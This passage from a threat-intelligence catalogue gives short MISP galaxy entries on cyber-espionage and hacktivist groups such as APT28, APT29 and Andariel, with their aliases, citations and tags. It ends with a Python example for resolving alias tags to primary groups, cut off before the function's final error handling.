Analysis of infrastructure, tools, and modes of operation revealed a potential relationship between [Ajax Security Team](https://app.tidalcyber.com/groups/e38bcb42-12c1-4202-a794-ec26cd830caa) and the campaign Operation Woolen-Goldfish.<sup>[[Check Point Rocket Kitten](https://app.tidalcyber.com/references/71da7d4c-f1f8-4f5c-a609-78a414851baf)]</sup><sup>[[TrendMicro Operation Woolen Goldfish March 2015](https://app.tidalcyber.com/references/0f077c93-aeda-4c95-9996-c52812a31267)]</sup>

The tag is: misp-galaxy:groups="Operation Woolen-Goldfish - Associated Group"

AjaxTM - Associated Group

<sup>[[FireEye Operation Saffron Rose 2013](https://app.tidalcyber.com/references/2f4c0941-d14e-4eb8-828c-f1d9a1e14a95)]</sup>

The tag is: misp-galaxy:groups="AjaxTM - Associated Group"

Flying Kitten - Associated Group

The tag is: misp-galaxy:groups="Flying Kitten - Associated Group"

Operation Saffron Rose - Associated Group

<sup>[[FireEye Operation Saffron Rose 2013](https://app.tidalcyber.com/references/2f4c0941-d14e-4eb8-828c-f1d9a1e14a95)]</sup>

The tag is: misp-galaxy:groups="Operation Saffron Rose - Associated Group"

Rocket Kitten - Associated Group

Analysis of infrastructure, tools, and modes of operation revealed a potential relationship between [Ajax Security Team](https://app.tidalcyber.com/groups/e38bcb42-12c1-4202-a794-ec26cd830caa) and Rocket Kitten.<sup>[[Check Point Rocket Kitten](https://app.tidalcyber.com/references/71da7d4c-f1f8-4f5c-a609-78a414851baf)]</sup><sup>[[IranThreats Kittens Dec 2017](https://app.tidalcyber.com/references/8338ad75-89f2-47d8-b85b-7cbf331bd7cd)]</sup>

The tag is: misp-galaxy:groups="Rocket Kitten - Associated Group"

Ajax Security Team

[Ajax Security Team](https://app.tidalcyber.com/groups/e38bcb42-12c1-4202-a794-ec26cd830caa) is a group that has been active since at least 2010 and believed to be operating out of Iran. By 2014 [Ajax Security Team](https://app.tidalcyber.com/groups/e38bcb42-12c1-4202-a794-ec26cd830caa) transitioned from website defacement operations to malware-based cyber espionage campaigns targeting the US defense industrial base and Iranian users of anti-censorship technologies.<sup>[[FireEye Operation Saffron Rose 2013](https://app.tidalcyber.com/references/2f4c0941-d14e-4eb8-828c-f1d9a1e14a95)]</sup>

The tag is: misp-galaxy:groups="Ajax Security Team"

Silent Chollima - Associated Group

<sup>[[CrowdStrike Silent Chollima Adversary September 2021](https://app.tidalcyber.com/references/835283b5-af3b-4baf-805e-da8ebbe8b5d2)]</sup>

The tag is: misp-galaxy:groups="Silent Chollima - Associated Group"

Andariel

[Andariel](https://app.tidalcyber.com/groups/2cc997b5-5076-4eef-9974-f54387614f46) is a North Korean state-sponsored threat group that has been active since at least 2009. [Andariel](https://app.tidalcyber.com/groups/2cc997b5-5076-4eef-9974-f54387614f46) has primarily focused its operations, which have included destructive attacks, against South Korean government agencies, military organizations, and a variety of domestic companies; they have also conducted cyber financial operations against ATMs, banks, and cryptocurrency exchanges. [Andariel](https://app.tidalcyber.com/groups/2cc997b5-5076-4eef-9974-f54387614f46)'s notable activity includes Operation Black Mine, Operation GoldenAxe, and Campaign Rifle.<sup>[[FSI Andariel Campaign Rifle July 2017](https://app.tidalcyber.com/references/bde61ee9-16f9-4bd9-a847-5cc9df21335c)]</sup><sup>[[IssueMakersLab Andariel GoldenAxe May 2017](https://app.tidalcyber.com/references/10a21964-d31f-40af-bf32-5ccd7d8c99a2)]</sup><sup>[[AhnLab Andariel Subgroup of Lazarus June 2018](https://app.tidalcyber.com/references/bbc66e9f-98f9-4e34-b568-2833ea536f2e)]</sup><sup>[[TrendMicro New Andariel Tactics July 2018](https://app.tidalcyber.com/references/b667eb44-8c2f-4319-bc93-f03610214b8b)]</sup><sup>[[CrowdStrike Silent Chollima Adversary September 2021](https://app.tidalcyber.com/references/835283b5-af3b-4baf-805e-da8ebbe8b5d2)]</sup>

[Andariel](https://app.tidalcyber.com/groups/2cc997b5-5076-4eef-9974-f54387614f46) is considered a sub-set of [Lazarus Group](https://app.tidalcyber.com/groups/0bc66e95-de93-4de7-b415-4041b7191f08), and has been attributed to North Korea’s Reconnaissance General Bureau.<sup>[[Treasury North Korean Cyber Groups September 2019](https://app.tidalcyber.com/references/54977bb2-2929-41d7-bdea-06d39dc76174)]</sup>

North Korean group definitions are known to have significant overlap, and some security researchers report all North Korean state-sponsored cyber activity under the name [Lazarus Group](https://app.tidalcyber.com/groups/0bc66e95-de93-4de7-b415-4041b7191f08) instead of tracking clusters or subgroups.

The tag is: misp-galaxy:groups="Andariel"

AnonGhost

AnonGhost is an apparent hacktivist collective. In October 2023, following a series of air- and land-based attacks in the Gaza Strip, AnonGhost was one of several hacktivist groups that claimed responsibility for disruptive attacks against computer networks in Israel. Researchers indicated that they observed AnonGhost actors exploit an undisclosed API vulnerability in Red Alert, an application that provides warning of projectile attacks in Israel, using Python scripts to intercept web requests and send spam messages to the app’s users.<sup>[[Group-IB Threat Intelligence Tweet October 9 2023](/references/2df546ed-6577-44b2-9b26-0a17c3622df7)]</sup>

The tag is: misp-galaxy:groups="AnonGhost"

Storm-1359 - Associated Group

<sup>[[Microsoft DDoS Attacks Response June 2023](/references/d64e941e-785b-4b23-a7d0-04f12024b033)]</sup>

The tag is: misp-galaxy:groups="Storm-1359 - Associated Group"

Anonymous Sudan

Anonymous Sudan is an apparent hacktivist collective that has primarily used distributed denial of service (DDoS) and website defacement attacks in support of its ideology, which appears to largely align with Russian state interests. The group regularly cross-promotes communications with Killnet, another hacktivist group that appears to share similar ideologies and methods of operation.<sup>[[Flashpoint Anonymous Sudan Timeline](/references/2e7060d2-f7bc-457e-a2e6-12897d503ea6)]</sup> Researchers assess that the group is affiliated with neither the Anonymous hacktivist group nor Sudan.<sup>[[CyberCX Anonymous Sudan June 19 2023](/references/68ded9b7-3042-44e0-8bf7-cdba2174a3d8)]</sup>

Since emerging in January 2023, Anonymous Sudan has claimed and is believed to be responsible for a considerable number of DDoS attacks affecting victims in a wide range of geographic locations and sectors.<sup>[[Flashpoint Anonymous Sudan Timeline](/references/2e7060d2-f7bc-457e-a2e6-12897d503ea6)]</sup> It claimed responsibility for a series of early June 2023 DDoS attacks that caused temporary interruptions to Microsoft Azure, Outlook, and OneDrive services. Microsoft security researchers attributed those attacks to the Storm-1359 group.<sup>[[The Hacker News Microsoft DDoS June 19 2023](/references/2ee27b55-b7a7-40a8-8c0b-5e28943cd273)]</sup><sup>[[Microsoft DDoS Attacks Response June 2023](/references/d64e941e-785b-4b23-a7d0-04f12024b033)]</sup> Like Killnet, Anonymous Sudan claimed responsibility for disruptive attacks against computer networks in Israel following a series of air- and land-based attacks in the Gaza Strip in October 2023.<sup>[[FalconFeedsio Tweet October 9 2023](/references/e9810a28-f060-468b-b4ea-ffed9403ae8b)]</sup>

The tag is: misp-galaxy:groups="Anonymous Sudan"

Aoqin Dragon

[Aoqin Dragon](https://app.tidalcyber.com/groups/454402a3-0503-45bf-b2e0-177fa2e2d412) is a suspected Chinese cyber espionage threat group that has been active since at least 2013. [Aoqin Dragon](https://app.tidalcyber.com/groups/454402a3-0503-45bf-b2e0-177fa2e2d412) has primarily targeted government, education, and telecommunication organizations in Australia, Cambodia, Hong Kong, Singapore, and Vietnam. Security researchers noted a potential association between [Aoqin Dragon](https://app.tidalcyber.com/groups/454402a3-0503-45bf-b2e0-177fa2e2d412) and UNC94, based on malware, infrastructure, and targets.<sup>[[SentinelOne Aoqin Dragon June 2022](https://app.tidalcyber.com/references/b4e792e0-b1fa-4639-98b1-233aaec53594)]</sup>

The tag is: misp-galaxy:groups="Aoqin Dragon"

Comment Group - Associated Group

The tag is: misp-galaxy:groups="Comment Group - Associated Group"

Comment Panda - Associated Group

The tag is: misp-galaxy:groups="Comment Panda - Associated Group"

Comment Crew - Associated Group

The tag is: misp-galaxy:groups="Comment Crew - Associated Group"

APT1

[APT1](https://app.tidalcyber.com/groups/5307bba1-2674-4fbd-bfd5-1db1ae06fc5f) is a Chinese threat group that has been attributed to the 2nd Bureau of the People’s Liberation Army (PLA) General Staff Department’s (GSD) 3rd Department, commonly known by its Military Unit Cover Designator (MUCD) as Unit 61398. <sup>[[Mandiant APT1](https://app.tidalcyber.com/references/865eba93-cf6a-4e41-bc09-de9b0b3c2669)]</sup>

The tag is: misp-galaxy:groups="APT1"

DynCalc - Associated Group

The tag is: misp-galaxy:groups="DynCalc - Associated Group"

IXESHE - Associated Group

The tag is: misp-galaxy:groups="IXESHE - Associated Group"

Numbered Panda - Associated Group

The tag is: misp-galaxy:groups="Numbered Panda - Associated Group"

DNSCALC - Associated Group

The tag is: misp-galaxy:groups="DNSCALC - Associated Group"

APT12

[APT12](https://app.tidalcyber.com/groups/225314a7-8f40-48d4-9cff-3ec39b177762) is a threat group that has been attributed to China. The group has targeted a variety of victims including but not limited to media outlets, high-tech companies, and multiple governments.<sup>[[Meyers Numbered Panda](https://app.tidalcyber.com/references/988dfcfc-0c16-4129-9523-a77539291951)]</sup>

The tag is: misp-galaxy:groups="APT12"

APT16

[APT16](https://app.tidalcyber.com/groups/06a05175-0812-44f5-a529-30eba07d1762) is a China-based threat group that has launched spearphishing campaigns targeting Japanese and Taiwanese organizations. <sup>[[FireEye EPS Awakens Part 2](https://app.tidalcyber.com/references/7fd58ef5-a0b7-40b6-8771-ca5e87740965)]</sup>

The tag is: misp-galaxy:groups="APT16"

Deputy Dog - Associated Group

The tag is: misp-galaxy:groups="Deputy Dog - Associated Group"

APT17

[APT17](https://app.tidalcyber.com/groups/5f083251-f5dc-459a-abfc-47a1aa7f5094) is a China-based threat group that has conducted network intrusions against U.S. government entities, the defense industry, law firms, information technology companies, mining companies, and non-government organizations. <sup>[[FireEye APT17](https://app.tidalcyber.com/references/a303f97a-72dd-4833-bac7-a421addc3242)]</sup>

The tag is: misp-galaxy:groups="APT17"

TG-0416 - Associated Group

<sup>[[ThreatStream Evasion Analysis](https://app.tidalcyber.com/references/de6bc044-6275-4cab-80a1-feefebd3c1f0)]</sup><sup>[[Anomali Evasive Maneuvers July 2015](https://app.tidalcyber.com/references/471ae30c-2753-468e-8e4d-6e7a3be599c9)]</sup>

The tag is: misp-galaxy:groups="TG-0416 - Associated Group"

Dynamite Panda - Associated Group

<sup>[[ThreatStream Evasion Analysis](https://app.tidalcyber.com/references/de6bc044-6275-4cab-80a1-feefebd3c1f0)]</sup><sup>[[Anomali Evasive Maneuvers July 2015](https://app.tidalcyber.com/references/471ae30c-2753-468e-8e4d-6e7a3be599c9)]</sup>

The tag is: misp-galaxy:groups="Dynamite Panda - Associated Group"

Threat Group-0416 - Associated Group

The tag is: misp-galaxy:groups="Threat Group-0416 - Associated Group"

APT18

[APT18](https://app.tidalcyber.com/groups/a0c31021-b281-4c41-9855-436768299fe7) is a threat group that has operated since at least 2009 and has targeted a range of industries, including technology, manufacturing, human rights groups, government, and medical. <sup>[[Dell Lateral Movement](https://app.tidalcyber.com/references/fcc9b52a-751f-4985-8c32-7aaf411706ad)]</sup>

The tag is: misp-galaxy:groups="APT18"

Codoso - Associated Group

The tag is: misp-galaxy:groups="Codoso - Associated Group"

C0d0so0 - Associated Group

The tag is: misp-galaxy:groups="C0d0so0 - Associated Group"

Codoso Team - Associated Group

The tag is: misp-galaxy:groups="Codoso Team - Associated Group"

Sunshop Group - Associated Group

The tag is: misp-galaxy:groups="Sunshop Group - Associated Group"

APT19

[APT19](https://app.tidalcyber.com/groups/713e2963-fbf4-406f-a8cf-6a4489d90439) is a China-based threat group that has targeted a variety of industries, including defense, finance, energy, pharmaceutical, telecommunications, high tech, education, manufacturing, and legal services. In 2017, a phishing campaign was used to target seven law and investment firms. <sup>[[FireEye APT19](https://app.tidalcyber.com/references/d75508b1-8b85-47c9-a087-bc64e8e4cb33)]</sup> Some analysts track [APT19](https://app.tidalcyber.com/groups/713e2963-fbf4-406f-a8cf-6a4489d90439) and [Deep Panda](https://app.tidalcyber.com/groups/43f826a1-e8c8-47b8-9b00-38e1b3e4293b) as the same group, but it is unclear from open source information if the groups are the same. <sup>[[ICIT China’s Espionage Jul 2016](https://app.tidalcyber.com/references/1a824860-6978-454d-963a-a56414a4312b)]</sup> <sup>[[FireEye APT Groups](https://app.tidalcyber.com/references/5b6b909d-870a-4d14-85ec-6aa14e598740)]</sup> <sup>[[Unit 42 C0d0so0 Jan 2016](https://app.tidalcyber.com/references/c740fc1c-093e-4389-890e-1fd88a824df4)]</sup>

The tag is: misp-galaxy:groups="APT19"

VIOLIN PANDA - Associated Group

The tag is: misp-galaxy:groups="VIOLIN PANDA - Associated Group"

TH3Bug - Associated Group

The tag is: misp-galaxy:groups="TH3Bug - Associated Group"

Crawling Taurus - Associated Group

<sup>[[Unit 42 ATOM Crawling Taurus](/references/75098b2c-4928-4e3f-9bcc-b4f6b8de96f8)]</sup>

The tag is: misp-galaxy:groups="Crawling Taurus - Associated Group"

Twivy - Associated Group

<sup>[[Mandiant APT Groups List](/references/c984fcfc-1bfd-4b1e-9034-a6ff3e6ebf97)]</sup>

The tag is: misp-galaxy:groups="Twivy - Associated Group"

APT20

APT20 is a suspected China-attributed espionage actor. It has attacked organizations in a wide range of verticals for data theft. These operations appear to be motivated by the acquisition of intellectual property but also collection of information around individuals with particular political interests.<sup>[[Mandiant APT Groups List](/references/c984fcfc-1bfd-4b1e-9034-a6ff3e6ebf97)]</sup> Researchers attributed, with medium confidence, the years-long Operation Wocao espionage campaign to APT20.<sup>[[FoxIT Wocao December 2019](/references/aa3e31c7-71cd-4a3f-b482-9049c9abb631)]</sup>

The tag is: misp-galaxy:groups="APT20"

IRON TWILIGHT - Associated Group

<sup>[[Secureworks IRON TWILIGHT Profile](https://app.tidalcyber.com/references/2fc5b9dc-3745-4760-b116-5cc5abb9101d)]</sup><sup>[[Secureworks IRON TWILIGHT Active Measures March 2017](https://app.tidalcyber.com/references/0d28c882-5175-4bcf-9c82-e6c4394326b6)]</sup>

The tag is: misp-galaxy:groups="IRON TWILIGHT - Associated Group"

Sednit - Associated Group

This designation has been used in reporting both to refer to the threat group and its associated malware JHUHUGIT.<sup>[[FireEye APT28 January 2017](https://app.tidalcyber.com/references/61d80b8f-5bdb-41e6-b59a-d2d996392873)]</sup><sup>[[SecureWorks TG-4127](https://app.tidalcyber.com/references/5f401c82-4e16-43a1-b234-48918fe7df9f)]</sup><sup>[[Kaspersky Sofacy](https://app.tidalcyber.com/references/46226f98-c762-48e3-9bcd-19ff14184bb5)]</sup><sup>[[Ars Technica GRU indictment Jul 2018](https://app.tidalcyber.com/references/a1192cb3-4536-4900-93c7-a127ca06c690)]</sup>

The tag is: misp-galaxy:groups="Sednit - Associated Group"

Sofacy - Associated Group

This designation has been used in reporting both to refer to the threat group and its associated malware.<sup>[[FireEye APT28](https://app.tidalcyber.com/references/c423b2b2-25a3-4a8d-b89a-83ab07c0cd20)]</sup><sup>[[SecureWorks TG-4127](https://app.tidalcyber.com/references/5f401c82-4e16-43a1-b234-48918fe7df9f)]</sup><sup>[[Crowdstrike DNC June 2016](https://app.tidalcyber.com/references/7f4edc06-ac67-4d71-b39c-5df9ce521bbb)]</sup><sup>[[ESET Sednit Part 3](https://app.tidalcyber.com/references/7c2be444-a947-49bc-b5f6-8f6bec870c6a)]</sup><sup>[[Ars Technica GRU indictment Jul 2018](https://app.tidalcyber.com/references/a1192cb3-4536-4900-93c7-a127ca06c690)]</sup><sup>[[Talos Seduploader Oct 2017](https://app.tidalcyber.com/references/2db77619-72df-461f-84bf-2d1c3499a5c0)]</sup>

The tag is: misp-galaxy:groups="Sofacy - Associated Group"

Fancy Bear - Associated Group

The tag is: misp-galaxy:groups="Fancy Bear - Associated Group"

SNAKEMACKEREL - Associated Group

<sup>[[Accenture SNAKEMACKEREL Nov 2018](https://app.tidalcyber.com/references/c38d021c-d84c-4aa7-b7a5-be47e18df1d8)]</sup>

The tag is: misp-galaxy:groups="SNAKEMACKEREL - Associated Group"

Swallowtail - Associated Group

The tag is: misp-galaxy:groups="Swallowtail - Associated Group"

Group 74 - Associated Group

The tag is: misp-galaxy:groups="Group 74 - Associated Group"

Pawn Storm - Associated Group

The tag is: misp-galaxy:groups="Pawn Storm - Associated Group"

STRONTIUM - Associated Group

<sup>[[Kaspersky Sofacy](https://app.tidalcyber.com/references/46226f98-c762-48e3-9bcd-19ff14184bb5)]</sup><sup>[[ESET Sednit Part 3](https://app.tidalcyber.com/references/7c2be444-a947-49bc-b5f6-8f6bec870c6a)]</sup><sup>[[Microsoft STRONTIUM Aug 2019](https://app.tidalcyber.com/references/7efd3c8d-5e69-4b6f-8edb-9186abdf0e1a)]</sup><sup>[[Microsoft STRONTIUM New Patterns Cred Harvesting Sept 2020](https://app.tidalcyber.com/references/0a65008c-acdd-40fa-af1a-3d9941af8eac)]</sup><sup>[[TrendMicro Pawn Storm Dec 2020](https://app.tidalcyber.com/references/3bc249cd-f29a-4a74-a179-a6860e43683f)]</sup><sup>[[Cybersecurity Advisory GRU Brute Force Campaign July 2021](https://app.tidalcyber.com/references/e70f0742-5f3e-4701-a46b-4a58c0281537)]</sup>

The tag is: misp-galaxy:groups="STRONTIUM - Associated Group"

Forest Blizzard - Associated Group

<sup>[[U.S. Federal Bureau of Investigation 2 27 2024](/references/962fb031-dfd1-43a7-8202-3a2231b0472b)]</sup>

The tag is: misp-galaxy:groups="Forest Blizzard - Associated Group"

Tsar Team - Associated Group

The tag is: misp-galaxy:groups="Tsar Team - Associated Group"

Threat Group-4127 - Associated Group

The tag is: misp-galaxy:groups="Threat Group-4127 - Associated Group"

TG-4127 - Associated Group

The tag is: misp-galaxy:groups="TG-4127 - Associated Group"

APT28

[APT28](https://app.tidalcyber.com/groups/5b1a5b9e-4722-41fc-a15d-196a549e3ac5) is a threat group that has been attributed to Russia’s General Staff Main Intelligence Directorate (GRU) 85th Main Special Service Center (GTsSS) military unit 26165.<sup>[[NSA/FBI Drovorub August 2020](https://app.tidalcyber.com/references/d697a342-4100-4e6b-95b9-4ae3ba80924b)]</sup><sup>[[Cybersecurity Advisory GRU Brute Force Campaign July 2021](https://app.tidalcyber.com/references/e70f0742-5f3e-4701-a46b-4a58c0281537)]</sup> This group has been active since at least 2004.<sup>[[DOJ GRU Indictment Jul 2018](https://app.tidalcyber.com/references/d65f371b-19d0-49de-b92b-94a2bea1d988)]</sup><sup>[[Ars Technica GRU indictment Jul 2018](https://app.tidalcyber.com/references/a1192cb3-4536-4900-93c7-a127ca06c690)]</sup><sup>[[Crowdstrike DNC June 2016](https://app.tidalcyber.com/references/7f4edc06-ac67-4d71-b39c-5df9ce521bbb)]</sup><sup>[[FireEye APT28](https://app.tidalcyber.com/references/c423b2b2-25a3-4a8d-b89a-83ab07c0cd20)]</sup><sup>[[SecureWorks TG-4127](https://app.tidalcyber.com/references/5f401c82-4e16-43a1-b234-48918fe7df9f)]</sup><sup>[[FireEye APT28 January 2017](https://app.tidalcyber.com/references/61d80b8f-5bdb-41e6-b59a-d2d996392873)]</sup><sup>[[GRIZZLY STEPPE JAR](https://app.tidalcyber.com/references/4b26d274-497f-49bc-a2a5-b93856a49893)]</sup><sup>[[Sofacy DealersChoice](https://app.tidalcyber.com/references/ec157d0c-4091-43f5-85f1-a271c4aac1fc)]</sup><sup>[[Palo Alto Sofacy 06-2018](https://app.tidalcyber.com/references/a32357eb-3226-4bee-aeed-d2fbcfa52da0)]</sup><sup>[[Symantec APT28 Oct 2018](https://app.tidalcyber.com/references/777bc94a-6c21-4f8c-9efa-a1cf52ececc0)]</sup><sup>[[ESET Zebrocy May 2019](https://app.tidalcyber.com/references/f8b837fb-e46c-4153-8e86-dc4b909b393a)]</sup>

[APT28](https://app.tidalcyber.com/groups/5b1a5b9e-4722-41fc-a15d-196a549e3ac5) reportedly compromised the Hillary Clinton campaign, the Democratic National Committee, and the Democratic Congressional Campaign Committee in 2016 in an attempt to interfere with the U.S. presidential election. <sup>[[Crowdstrike DNC June 2016](https://app.tidalcyber.com/references/7f4edc06-ac67-4d71-b39c-5df9ce521bbb)]</sup> In 2018, the US indicted five GRU Unit 26165 officers associated with [APT28](https://app.tidalcyber.com/groups/5b1a5b9e-4722-41fc-a15d-196a549e3ac5) for cyber operations (including close-access operations) conducted between 2014 and 2018 against the World Anti-Doping Agency (WADA), the US Anti-Doping Agency, a US nuclear facility, the Organization for the Prohibition of Chemical Weapons (OPCW), the Spiez Swiss Chemicals Laboratory, and other organizations.<sup>[[US District Court Indictment GRU Oct 2018](https://app.tidalcyber.com/references/56aeab4e-b046-4426-81a8-c3b2323492f0)]</sup> Some of these were conducted with the assistance of GRU Unit 74455, which is also referred to as [Sandworm Team](https://app.tidalcyber.com/groups/16a65ee9-cd60-4f04-ba34-f2f45fcfc666).

The tag is: misp-galaxy:groups="APT28"

StellarParticle - Associated Group

<sup>[[CrowdStrike SUNSPOT Implant January 2021](https://app.tidalcyber.com/references/3a7b71cf-961a-4f63-84a8-31b43b18fb95)]</sup><sup>[[CrowdStrike StellarParticle January 2022](https://app.tidalcyber.com/references/149c1446-d6a1-4a63-9420-def9272d6cb9)]</sup>

The tag is: misp-galaxy:groups="StellarParticle - Associated Group"

NOBELIUM - Associated Group

The tag is: misp-galaxy:groups="NOBELIUM - Associated Group"

Cozy Bear - Associated Group

The tag is: misp-galaxy:groups="Cozy Bear - Associated Group"

IRON HEMLOCK - Associated Group

<sup>[[Secureworks IRON HEMLOCK Profile](https://app.tidalcyber.com/references/36191a48-4661-42ea-b194-2915c9b184f3)]</sup>

The tag is: misp-galaxy:groups="IRON HEMLOCK - Associated Group"

Dark Halo - Associated Group

The tag is: misp-galaxy:groups="Dark Halo - Associated Group"

The Dukes - Associated Group

The tag is: misp-galaxy:groups="The Dukes - Associated Group"

SolarStorm - Associated Group

<sup>[[Unit 42 SolarStorm December 2020](https://app.tidalcyber.com/references/ecbb602a-2427-5eba-8c2b-25d90c95f166)]</sup>

The tag is: misp-galaxy:groups="SolarStorm - Associated Group"

Blue Kitsune - Associated Group

The tag is: misp-galaxy:groups="Blue Kitsune - Associated Group"

UNC3524 - Associated Group

<sup>[[Mandiant APT29 Eye Spy Email Nov 22](https://app.tidalcyber.com/references/452ca091-42b1-5bef-8a01-921c1f46bbee)]</sup>

The tag is: misp-galaxy:groups="UNC3524 - Associated Group"

Midnight Blizzard - Associated Group

<sup>[[Microsoft Midnight Blizzard January 19 2024](/references/91b48ddd-9e3f-4d36-a262-3b52145b3db2)]</sup>

The tag is: misp-galaxy:groups="Midnight Blizzard - Associated Group"

IRON RITUAL - Associated Group

<sup>[[Secureworks IRON RITUAL Profile](https://app.tidalcyber.com/references/c1ff66d6-3ea3-4347-8a8b-447cd8b48dab)]</sup>

The tag is: misp-galaxy:groups="IRON RITUAL - Associated Group"

NobleBaron - Associated Group

<sup>[[SentinelOne NobleBaron June 2021](https://app.tidalcyber.com/references/98cf2bb0-f36c-45af-8d47-bf26aca3bb09)]</sup>

The tag is: misp-galaxy:groups="NobleBaron - Associated Group"

UNC2452 - Associated Group

<sup>[[FireEye SUNBURST Backdoor December 2020](https://app.tidalcyber.com/references/d006ed03-a8af-4887-9356-3481d81d43e4)]</sup>

The tag is: misp-galaxy:groups="UNC2452 - Associated Group"

YTTRIUM - Associated Group

<sup>[[Microsoft Unidentified Dec 2018](https://app.tidalcyber.com/references/896c88f9-8765-4b60-b679-667b338757e3)]</sup>

The tag is: misp-galaxy:groups="YTTRIUM - Associated Group"

CozyDuke - Associated Group

The tag is: misp-galaxy:groups="CozyDuke - Associated Group"

APT29

[APT29](https://app.tidalcyber.com/groups/4c3e48b9-4426-4271-a7af-c3dfad79f447) is a threat group that has been attributed to Russia’s Foreign Intelligence Service (SVR).<sup>[[White House Imposing Costs RU Gov April 2021](https://app.tidalcyber.com/references/c2bf9e2f-cd0a-411d-84bc-61454a369c6b)]</sup><sup>[[UK Gov Malign RIS Activity April 2021](https://app.tidalcyber.com/references/7fe5a605-c33e-4d3d-b787-2d1f649bee53)]</sup> They have operated since at least 2008, often targeting government networks in Europe and NATO member countries, research institutes, and think tanks. [APT29](https://app.tidalcyber.com/groups/4c3e48b9-4426-4271-a7af-c3dfad79f447) reportedly compromised the Democratic National Committee starting in the summer of 2015.<sup>[[F-Secure The Dukes](https://app.tidalcyber.com/references/cc0dc623-ceb5-4ac6-bfbb-4f8514d45a27)]</sup><sup>[[GRIZZLY STEPPE JAR](https://app.tidalcyber.com/references/4b26d274-497f-49bc-a2a5-b93856a49893)]</sup><sup>[[Crowdstrike DNC June 2016](https://app.tidalcyber.com/references/7f4edc06-ac67-4d71-b39c-5df9ce521bbb)]</sup><sup>[[UK Gov UK Exposes Russia SolarWinds April 2021](https://app.tidalcyber.com/references/ffbd83d7-9d4f-42b9-adc0-eb144045aef2)]</sup>

In April 2021, the US and UK governments attributed the [SolarWinds Compromise](https://app.tidalcyber.com/campaigns/8bde8146-0656-5800-82e6-e24e008e4f4a) to the SVR; public statements included citations to [APT29](https://app.tidalcyber.com/groups/4c3e48b9-4426-4271-a7af-c3dfad79f447), Cozy Bear, and The Dukes.<sup>[[NSA Joint Advisory SVR SolarWinds April 2021](https://app.tidalcyber.com/references/43d9c469-1d54-454b-ba67-74e7f1de9c10)]</sup><sup>[[UK NSCS Russia SolarWinds April 2021](https://app.tidalcyber.com/references/f49e6780-8caa-4c3c-8d68-47a2cc4319a1)]</sup> Industry reporting also referred to the actors involved in this campaign as UNC2452, NOBELIUM, StellarParticle, Dark Halo, and SolarStorm.<sup>[[FireEye SUNBURST Backdoor December 2020](https://app.tidalcyber.com/references/d006ed03-a8af-4887-9356-3481d81d43e4)]</sup><sup>[[MSTIC NOBELIUM Mar 2021](https://app.tidalcyber.com/references/8688a0a9-d644-4b96-81bb-031f1f898652)]</sup><sup>[[CrowdStrike SUNSPOT Implant January 2021](https://app.tidalcyber.com/references/3a7b71cf-961a-4f63-84a8-31b43b18fb95)]</sup><sup>[[Volexity SolarWinds](https://app.tidalcyber.com/references/355cecf8-ef3e-4a6e-a652-3bf26fe46d88)]</sup><sup>[[Cybersecurity Advisory SVR TTP May 2021](https://app.tidalcyber.com/references/e18c1b56-f29d-4ea9-a425-a6af8ac6a347)]</sup><sup>[[Unit 42 SolarStorm December 2020](https://app.tidalcyber.com/references/ecbb602a-2427-5eba-8c2b-25d90c95f166)]</sup>

The tag is: misp-galaxy:groups="APT29"
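
Every entry in this galaxy carries a tag of the form misp-galaxy:groups="<cluster value>", and aliases such as Cozy Bear, UNC2452 or NOBELIUM appear as their own " - Associated Group" clusters alongside the primary APT29 cluster. When events tagged by different sources are ingested, the same actor can therefore arrive under several tags. The following Python is an added example, not code from MISP or Tidal Cyber: it parses the tag syntax, rejects malformed tags, and collapses alias tags to the tag of the primary group. The cluster list is constructed for the example and modelled on the APT29 and APT38 entries on this page; its uuids are placeholders, and the assumption that each " - Associated Group" cluster points at its primary group through a "related" edge is an assumption about the JSON layout, which this page does not show.

```python
import re
from typing import Dict, List, Tuple

# Tag syntax used throughout this page: misp-galaxy:<galaxy>="<cluster value>".
# Cluster values may contain spaces, hyphens and "@" (e.g. admin@338), so anything
# between the quotes except a double quote is accepted.
TAG_RE = re.compile(r'^misp-galaxy:(?P<galaxy>[A-Za-z0-9_.-]+)="(?P<value>[^"]+)"$')
ASSOC_SUFFIX = " - Associated Group"

# Constructed data in the shape of a galaxy "values" array. The uuids are
# placeholders (not real cluster uuids) and the "related" linkage from an alias
# to its primary group is an assumption about how the export is built.
CLUSTERS: List[dict] = [
    {"value": "APT29", "uuid": "11111111-1111-4111-8111-111111111111"},
    {"value": "Cozy Bear - Associated Group", "uuid": "22222222-2222-4222-8222-222222222222",
     "related": [{"dest-uuid": "11111111-1111-4111-8111-111111111111", "type": "similar"}]},
    {"value": "UNC2452 - Associated Group", "uuid": "33333333-3333-4333-8333-333333333333",
     "related": [{"dest-uuid": "11111111-1111-4111-8111-111111111111", "type": "similar"}]},
    {"value": "APT38", "uuid": "44444444-4444-4444-8444-444444444444"},
    {"value": "Bluenoroff - Associated Group", "uuid": "55555555-5555-4555-8555-555555555555",
     "related": [{"dest-uuid": "44444444-4444-4444-8444-444444444444", "type": "similar"}]},
    # An alias whose primary group is missing from the export: resolution must fail loudly.
    {"value": "Orphan - Associated Group", "uuid": "66666666-6666-4666-8666-666666666666",
     "related": [{"dest-uuid": "99999999-9999-4999-8999-999999999999", "type": "similar"}]},
]


def parse_tag(tag: str) -> Tuple[str, str]:
    """Split a misp-galaxy tag into (galaxy, value); reject anything malformed."""
    m = TAG_RE.match(tag)
    if not m:
        raise ValueError(f"not a misp-galaxy tag: {tag!r}")
    return m.group("galaxy"), m.group("value")


def make_tag(galaxy: str, value: str) -> str:
    """Rebuild a tag string in the exact form used on this page."""
    return f'misp-galaxy:{galaxy}="{value}"'


def index_clusters(clusters: List[dict]) -> Tuple[Dict[str, dict], Dict[str, dict]]:
    """Index clusters by value and by uuid so alias edges can be followed directly."""
    by_value = {c["value"]: c for c in clusters}
    by_uuid = {c["uuid"]: c for c in clusters}
    return by_value, by_uuid


def resolve_primary(tag: str, clusters: List[dict] = CLUSTERS) -> str:
    """Return the canonical tag of the primary group behind a (possibly alias) tag.

    Tags that already name a primary group are returned unchanged. Alias tags
    (values ending in " - Associated Group") are followed through their "related"
    edge to a non-alias cluster. Unknown values and dangling edges raise KeyError
    so an ingest pipeline never keeps an unresolved alias silently.
    """
    galaxy, value = parse_tag(tag)
    by_value, by_uuid = index_clusters(clusters)
    cluster = by_value.get(value)
    if cluster is None:
        raise KeyError(f"unknown cluster value {value!r} in galaxy {galaxy!r}")
    if not value.endswith(ASSOC_SUFFIX):
        return make_tag(galaxy, value)
    for edge in cluster.get("related", []):
        target = by_uuid.get(edge["dest-uuid"])
        if target is not None and not target["value"].endswith(ASSOC_SUFFIX):
            return make_tag(galaxy, target["value"])
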